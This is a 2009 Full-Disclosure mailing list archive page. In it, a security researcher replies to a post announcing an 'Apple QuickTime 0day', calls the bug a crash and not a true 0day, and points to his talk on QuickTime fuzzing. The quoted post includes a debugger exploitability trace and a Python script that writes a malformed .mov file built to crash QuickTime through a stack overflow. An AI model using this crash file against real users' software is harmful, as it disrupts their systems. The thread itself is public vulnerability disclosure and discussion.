lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <4A36B0D9.10206@crucialsecurity.com>
Date: Mon, 15 Jun 2009 16:36:41 -0400
From: Jared DeMott <jdemott@...cialsecurity.com>
To: webDEViL <w3bd3vil@...il.com>
Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>,
	dailydave@...ts.immunitysec.com
Subject: Re: Apple QuickTime 0day

Excellent.  Doesn't trigger on Mac.  I just did a talk on QuickTime
hacking at ShakaCon III -- which btw -- can I just say "best place for a
 con ever!".  My slides are at www.vdalabs.com.  The slides might give
you some insight into the types of exceptions you're hoping for.  To
boil it down, a tool like "!exploitable" is nice since it could be used
to bin crashes into "read exception" or "write exception" (the type
you're looking for).  Oh, and by the way, you can't really call a crash
an 0day.  I called them "0day crashes" in my talk, just to be clear.

Blessings,
Jared


webDEViL wrote:
> Try it with your latest quicktime player.
> --------------------------------------------------------------
> 
> #0:000> !exploitable -v
> #HostMachine\HostUser
> #Executing Processor Architecture is x86
> 
> #Debuggee is in User Mode
> #Debuggee is a live user mode debugging session on the local machine
> #Event Type: Exception
> #Exception Faulting Address: 0x66830f9b
> #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)
> 
> #
> #Faulting Instruction:66830f9b push ebx
> #
> #Basic Block:
> #    66830f9b push ebx
> #       Tainted Input Operands: ebx
> #    66830f9c push ebp
> #    66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]
> 
> #    66830fa4 push esi
> #    66830fa5 push edi
> #    66830fa6 mov edi,ecx
> #    66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)
> #    66830fae mov ebx,edx
> #    66830fb0 mov dword ptr [esp+14h],eax
> 
> #    66830fb4 mov byte ptr [esp+10h],0
> #    66830fb9 mov byte ptr [esp+11h],0
> #    66830fbe mov byte ptr [esp+12h],0
> #    66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
> #
> #Exception Hash (Major/Minor): 0x614b6671.0x614b786e
> 
> #
> #Stack Trace:
> #QuickTime!DllMain+0x2fabb
> #<Unloaded_papi.dll>+0x1231137
> #Instruction Address: 0x66830f9b
> #
> #Description: Stack Overflow
> #Short Description: StackOverflow
> #Exploitability Classification: UNKNOWN
> 
> #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)
> 
> print "------------------------------"
> print "w3bd3vil [at] gmail [dot] com"
> print "Apple QuickTime CRGN Atom 0day"
> 
> print "------------------------------"
> bytes = [
> 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
> 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
> 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
> 
> 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
> 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
> 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
> 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
> 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
> 
> 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
> 
> 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
> 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
> 
> 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
> 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
> 
> f = open("webDEViL.mov", "wb")
> for byte in bytes: f.write("%c" % byte)
> 
> f.close()
> print "webDEViL.mov created! (%d bytes)" % len(bytes)
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ